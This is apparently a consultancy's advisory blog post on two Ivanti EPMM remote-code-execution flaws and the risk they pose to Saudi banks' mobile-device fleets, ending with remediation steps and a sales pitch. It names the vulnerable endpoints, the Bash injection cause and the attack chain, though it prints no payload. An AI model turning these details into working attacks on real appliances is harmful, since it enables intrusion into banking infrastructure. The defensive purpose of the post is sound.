CVE-2026-1281 & CVE-2026-1340: The Ivanti EPMM Zero-Days Putting Saudi Bank MDM Fleets at Risk

Two unauthenticated remote code execution flaws in Ivanti Endpoint Manager Mobile (EPMM) — CVE-2026-1281 and CVE-2026-1340, both CVSS 9.8 — are under mass exploitation, with a single bulletproof-hosted IP address responsible for more than 83% of observed attacks. For Saudi financial institutions running EPMM to manage thousands of corporate-owned iPhones, iPads, and Android endpoints, this is not a theoretical risk. It is a live compromise path to the crown jewels of your mobile fleet.

Anatomy of the Ivanti EPMM Zero-Day Exploitation

Both vulnerabilities live in on-premises EPMM installations and stem from improper handling of attacker-controlled input inside Bash scripts — specifically arithmetic expansion in the map-appstore-url script. An unauthenticated attacker simply issues a crafted HTTP GET request against the In-House Application Distribution endpoint (/mifs/c/appstore/fob/) or the Android File Transfer Configuration endpoint (/mifs/c/aftstore/fob/), and arbitrary OS commands execute on the appliance as the EPMM service user. Public proof-of-concept code has been circulating since 30 January 2026, and CVE-2026-1281 is now listed in the CISA Known Exploited Vulnerabilities catalog.

Why One IP Is Driving 83% of the Attacks

Threat intelligence telemetry has traced the overwhelming majority of in-the-wild exploitation to a single IP hosted on bulletproof infrastructure — the same address simultaneously exploiting CVE-2026-21962 in Oracle WebLogic and CVE-2026-24061 in GNU Inetutils Telnetd. The observed kill chain is fast and repeatable: initial RCE via /fob/ endpoints, immediate download of the /slt second-stage script, deployment of a web shell, followed by either a cryptominer for opportunistic monetization or a persistent backdoor for follow-on access. In several incidents investigators recovered artifacts that map cleanly to prior RaaS tradecraft — meaning a ransomware affiliate is using EPMM as the door.

Why EPMM Compromise Is Catastrophic for a Bank

EPMM is not a peripheral system. It holds the configuration profiles, VPN credentials, certificate trust chains, and push-notification keys for every managed mobile device on the executive floor, the trading desk, and the branch network. An attacker with root on the appliance can push a malicious configuration profile to every device in scope, silently install a custom CA to decrypt TLS traffic, issue arbitrary MDM commands including remote wipe, or harvest the MDM-issued certificates used for Wi-Fi and VPN access. In a Saudi banking context, this is equivalent to compromising the privileged access management layer for the mobile estate — and it does so without triggering the SOC's traditional EDR controls, because the appliance itself is often excluded from endpoint coverage.

Impact on Saudi Financial Institutions

Under the SAMA Cyber Security Control Central Framework (CSCC) subdomain 3.3.14 (Mobile Devices Security) and 3.3.9 (Vulnerability Management), the EPMM fleet sits squarely inside the regulated perimeter. Failure to patch a CISA KEV-listed vulnerability within SAMA's expected remediation window is a direct audit finding, and exploitation of EPMM creates reportable incidents under the Banking Consumer Protection Principles and the Personal Data Protection Law (PDPL) the moment any customer-identifying data flows through a compromised device. For institutions assessed under NCA ECC-1:2018, controls 2-5-3 (Mobile Devices and BYOD Security) and 2-10-3 (Patch and Vulnerability Management) are in scope. Saudi banks running EPMM on-premises — still the dominant deployment model in the Kingdom due to data-residency requirements — cannot assume they are out of reach of this campaign. Internet-facing EPMM consoles have been the norm for branch-manager provisioning, which is exactly the attack surface the 83%-IP is scanning.

Recommendations and Practical Steps

1. Apply Ivanti's emergency RPM patch (12.x.0.x or 12.x.1.x depending on your deployment branch) immediately — no downtime is required, and a permanent fix ships in 12.8.0.0.
2. Execute threat hunting for the known IoCs: outbound HTTP GETs to /mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/ with Bash-injection payloads, appearance of a /slt file on the appliance, and new cron or systemd persistence under the tomcat or mifs service user.
3. Block or tightly restrict management-plane access: the EPMM admin portal and the /mifs/c/ paths should sit behind a bastion or VPN, never on the public internet.
4. Rotate every MDM-issued certificate, SCEP token, APNs key, and VPN profile secret provisioned through EPMM since 1 January 2026 — assume secret compromise until forensic evidence says otherwise.
5. Sweep connected mobile devices for unauthorized configuration profiles, unexpected root CAs, and unexplained VPN endpoints pushed from the appliance.
6. File an incident pre-notification to SAMA if compromise is confirmed, even if no data exfiltration is yet proven — the window shrinks once data subjects are involved.
7. Engage penetration testing focused specifically on the MDM tier; most annual CBEST/SAMA CSCC assessments under-test this surface because it is treated as IT ops rather than security infrastructure.

Conclusion

The Ivanti EPMM campaign is a textbook example of what SAMA CSCC calls out in subdomain 3.3.9: vulnerability exploitation windows are collapsing from weeks to hours, and infrastructure-level products with privileged reach across the mobile fleet must be treated as Tier-0 assets, not appliances. A single unpatched EPMM console is enough to invert your entire mobile security model.

Is your organization prepared? Contact Fyntralink for a complimentary SAMA Cyber Maturity Assessment — our team will map your MDM, privileged infrastructure, and internet-facing administrative attack surface against SAMA CSCC and NCA ECC requirements, and deliver a prioritized remediation roadmap.